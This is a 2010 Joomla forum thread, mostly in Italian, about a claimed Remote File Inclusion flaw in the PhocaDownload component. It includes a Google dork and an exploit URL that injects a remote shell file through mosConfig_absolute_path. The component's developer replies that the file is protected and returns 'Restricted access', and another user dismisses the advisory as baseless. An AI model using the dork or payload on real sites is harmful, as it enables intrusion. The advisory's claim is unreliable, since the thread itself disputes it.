Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 10 Nov 2010, 12:28:33

: Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: jeckodevelopment 10 Nov 2010, 12:28:33

Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
Non si hanno ancora maggiori informazioni riguardo la presunta vulnerabilità di tipo RFI (Remote File Inclusion) del componente PhocaDownload, si consiglia di visitare spesso il sito dello sviluppatore del componente e verificare la presenza di eventuali aggiornamenti.

:

=========================================================

Joomla Component Phocadownload RFI Vulnerability

=========================================================
Title : Joomla Component phocadownload RFI Vulnerability
Software : Phocadownload
Vendor : http://www.phoca.cz/
Download :
http://www.phoca.cz/download/category/4-phoca-download-component

###########################################
Dork : inurl:index.php?option="com_phocadownload"
-----------------------------------------------------------------------
RFI Exploit

Exploit :

http://example.com/components/com_phocadownload/phocadownload.php?mosConfig
_absolute_path=[ Shell txt ]



: Re:Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: H13 22 Nov 2010, 19:30:41

Hi, Phoca Download does not work with the variable: mosConfig
_absolute_path

Mostly Joomla! itself doesn't allow to access directly the file.

Exactly:
phocadownload.php is protected by:
defined( '_JEXEC' ) or die( 'Restricted access' );

so you get "Restricted access", nothing more.

Jan

: Re:Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: mau_develop 22 Nov 2010, 19:59:06

yeah! ... of course... like other without a short poc or disclosure.... only kiddie and obsolete advisory service

thanks for your post and script

bye

M.